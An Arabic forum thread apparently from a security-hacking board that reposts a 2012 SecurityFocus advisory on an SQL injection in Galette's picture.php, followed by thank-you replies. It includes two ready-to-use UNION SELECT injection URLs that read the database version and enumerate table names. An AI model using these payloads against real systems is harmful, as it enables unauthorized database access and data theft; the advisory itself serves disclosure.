المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغره جديده { Galette (picture.php) SQL Injection Vulnerability }



اخلاقي تاج راسي
05-14-2012, 05:39 AM
السلام عليكم و رحمة الله و بركاته

Source: http://www.securityfocus.com/bid/53463/info

Galette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Versions prior to Galette 0.7.x are vulnerable.

Attackers can use a browser to exploit this issue.

The following example URIs are available.

http://server/picture.php?id_adh=0+and+1=0+union+select+@@versio n,null

http://server/picture.php?id_adh=0+and+1=0+union+select+group_co ncat(table_name,char(10)),null+from+information_sc hema.tables


رابط الثغره: http://www.exploit-db.com/exploits/18875



تحياتي:wink:

يارب رحمتك
05-24-2012, 09:04 AM
آسآ‘ل آلله آن يجعًل هذآ آلعمًل فى ميزآن حسنآتكً ..
وربنا يكتر من ثغرآتًك :- هههههههههههههههه

اخلاقي تاج راسي
05-24-2012, 09:33 AM
آسآ‘ل آلله آن يجعًل هذآ آلعمًل فى ميزآن حسنآتكً ..
وربنا يكتر من ثغرآتًك :- هههههههههههههههه

ربي يعطيكـ العافيه

بسراحه آحىا تحفــيز :tongue:

تحيــآتي : .

اخلاقي تاج راسي
05-24-2012, 09:36 AM
ربي يعطيكـ العافيه

بسراحه آحىا تحفــيز

تحيــآتي : .



ربي يعطيكـ العافيه

بسراحه آحلىا تحفــيز

تحيــآتي : .